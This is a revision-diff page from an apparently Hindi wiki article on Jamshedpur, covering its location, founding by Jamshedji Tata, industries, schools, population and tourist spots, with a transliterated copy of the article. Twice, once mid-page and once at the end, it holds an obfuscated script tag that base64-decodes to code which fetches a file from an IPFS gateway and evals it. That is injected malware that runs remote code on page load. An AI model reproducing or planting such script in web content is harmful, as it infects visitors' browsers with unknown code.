Difference between revisions of "जमशेदपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
{{लेख सूची|लेख का नाम=जमशेदपुर|पर्यटन=जमशेदपुर पर्यटन|ज़िला=जमशेदपुर ज़िला}}
 
{{लेख सूची|लेख का नाम=जमशेदपुर|पर्यटन=जमशेदपुर पर्यटन|ज़िला=जमशेदपुर ज़िला}}
 
[[चित्र:Dimna-Lake-Jamshedpur.jpg|thumb|250px|[[डिमना झील जमशेदपुर|डिमना झील]], जमशेदपुर<br />Dimna Lake, Jamshedpur]]
 
[[चित्र:Dimna-Lake-Jamshedpur.jpg|thumb|250px|[[डिमना झील जमशेदपुर|डिमना झील]], जमशेदपुर<br />Dimna Lake, Jamshedpur]]
जमशेदपुर शहर, पूर्वी [[सिंहभूम ज़िला]], [[झारखण्ड]] राज्य ([[बिहार]] से अलग होकर बना नवगठित राज्य), पूर्वोत्तर [[भारत]], सुवर्णरेखा और खरकई नदियों के संगम पर स्थित है। यहाँ नेशनल मेटलर्जिकल लेबोरेट्री स्थित है।
+
जमशेदपुर शहर, [[पूर्वी सिंहभूम ज़िला]], [[झारखण्ड]] राज्य ([[बिहार]] से अलग होकर बना नवगठित राज्य), पूर्वोत्तर [[भारत]], सुवर्णरेखा और खरकई नदियों के संगम पर स्थित है। यहाँ नेशनल मेटलर्जिकल लेबोरेट्री स्थित है। 'ऑल इंडिया झारखण्ड स्टूडेन्ट यूनियन' का गठन भी जमशेदपुर में हुआ था।
 
==स्थापना==
 
==स्थापना==
टाटानगर के नाम से जाने जाते इस शहर की स्थापना 1907 में उद्योगपति जमशेदजी टाटा ने की थी, जो तेज़ी से एक महत्वपूर्ण नगर बन गया। राज्य का दूसरा सबसे बड़ा शहर जमशेदपुर महत्वपूर्ण रेल और सड़क जंक्शन है।  
+
टाटानगर के नाम से जाने जाते इस शहर की स्थापना 1907 में उद्योगपति जमशेदजी टाटा ने की थी, जो तेज़ी से एक महत्त्वपूर्ण नगर बन गया। राज्य का दूसरा सबसे बड़ा शहर जमशेदपुर महत्त्वपूर्ण रेल और सड़क जंक्शन है।  
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
 
यहाँ के उद्योगों में [[भारत]] का प्रमुख लोहा और इस्पात का कारख़ाना, वाहन संयोजन कारख़ाना, कृषि उपकरणों का निर्माण, कलई किए हुए लोहे के बर्तन, तथा रेल इंजन के पुर्जे बनाने के कारख़ाने शामिल हैं।  
 
यहाँ के उद्योगों में [[भारत]] का प्रमुख लोहा और इस्पात का कारख़ाना, वाहन संयोजन कारख़ाना, कृषि उपकरणों का निर्माण, कलई किए हुए लोहे के बर्तन, तथा रेल इंजन के पुर्जे बनाने के कारख़ाने शामिल हैं।  
Line 11: Line 11:
 
2001 की जनगणना के अनुसार जमशेदपुर शहर की कुल जनसंख्या 5,70,349 है।
 
2001 की जनगणना के अनुसार जमशेदपुर शहर की कुल जनसंख्या 5,70,349 है।
 
==पर्यटन==
 
==पर्यटन==
लौहनगरी के रुप में विख्‍यात जमशेदपुर केवल [[झारखंड]] में नहीं, बल्कि पूरे विश्‍व पटल पर चर्चित है। इसे टाटानगर के भी नाम से जाना जाता है। पर्यटन की दृष्टि से टाटानगर का महत्‍व अंतराष्‍ट्रीय स्‍तर पर भी है। टिस्‍को, टेल्‍को जैसे अंतर्राष्‍टीय स्‍तर के कारखाने के अलावा डिमना लेक, जुबली पार्क, दलमा पहाड़, हुडको लेक, मोदी पार्क, कीनन स्‍टेडियम आदि ऐसे जगह है जहाँ पर्यटक घूम सकते है।
+
लौहनगरी के रूप में विख्‍यात जमशेदपुर केवल [[झारखंड]] में नहीं, बल्कि पूरे विश्‍व पटल पर चर्चित है। इसे 'टाटानगर' के भी नाम से जाना जाता है। पर्यटन की दृष्टि से टाटानगर का महत्‍व अंतराष्‍ट्रीय स्‍तर पर भी है। टिस्‍को, टेल्‍को जैसे अंतर्राष्‍टीय स्‍तर के कारखाने के अलावा [[डिमना झील जमशेदपुर|डिमना झील]], जुबली पार्क, [[दालम पहाड़ी]], हुडको लेक, मोदी पार्क, कीनन स्‍टेडियम आदि ऐसी जगह हैं, जहाँ पर्यटक घूम सकते हैं।
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
  
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{झारखण्ड के नगर}}
 
{{झारखण्ड के पर्यटन स्थल}}
 
{{झारखण्ड के पर्यटन स्थल}}
 
[[Category:झारखण्ड]] [[Category:झारखण्ड के पर्यटन स्थल]] [[Category:झारखण्ड के नगर]]  [[Category:पर्यटन कोश]]
 
[[Category:झारखण्ड]] [[Category:झारखण्ड के पर्यटन स्थल]] [[Category:झारखण्ड के नगर]]  [[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:51, 3 October 2012

jamashedapur jamashedapur paryatan jamashedapur zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:Dimna-Lake-Jamshedpur.jpg|thumb|250px|dimana jhil, jamashedapur
Dimna Lake, Jamshedpur]] jamashedapur shahar, poorvi sianhabhoom zila, jharakhand rajy (bihar se alag hokar bana navagathit rajy), poorvottar bharat, suvarnarekha aur kharakee nadiyoan ke sangam par sthit hai. yahaan neshanal metalarjikal leboretri sthit hai. 'aaul iandiya jharakhand stoodent yooniyan' ka gathan bhi jamashedapur mean hua tha.

sthapana

tatanagar ke nam se jane jate is shahar ki sthapana 1907 mean udyogapati jamashedaji tata ne ki thi, jo tezi se ek mahattvapoorn nagar ban gaya. rajy ka doosara sabase b da shahar jamashedapur mahattvapoorn rel aur s dak jankshan hai.

udyog aur vyapar

yahaan ke udyogoan mean bharat ka pramukh loha aur ispat ka karakhana, vahan sanyojan karakhana, krishi upakaranoan ka nirman, kalee kie hue lohe ke bartan, tatha rel ianjan ke purje banane ke karakhane shamil haian.

shikshan sansthan

yahaan ke shaikshanik sansthanoan mean zeviyar lebar rileshans ianstityoot (eks.el.ar.aee.), mahatma gaandhi memoriyal medikal k aaulej aur snatak star ke kee mahavidyalay shamil haian. eks.el.ar.aee. jamashedapur bharat ke sarvashreshth agrani prabandhan skooloan mean se ek hai.

janasankhya

2001 ki janaganana ke anusar jamashedapur shahar ki kul janasankhya 5,70,349 hai.

paryatan

lauhanagari ke roop mean vikhh‍yat jamashedapur keval jharakhand mean nahian, balki poore vishh‍v patal par charchit hai. ise 'tatanagar' ke bhi nam se jana jata hai. paryatan ki drishti se tatanagar ka mahath‍v aantarashh‍triy sh‍tar par bhi hai. tish‍ko, telh‍ko jaise aantarrashh‍tiy sh‍tar ke karakhane ke alava dimana jhil, jubali park, dalam paha di, hudako lek, modi park, kinan sh‍tediyam adi aisi jagah haian, jahaan paryatak ghoom sakate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>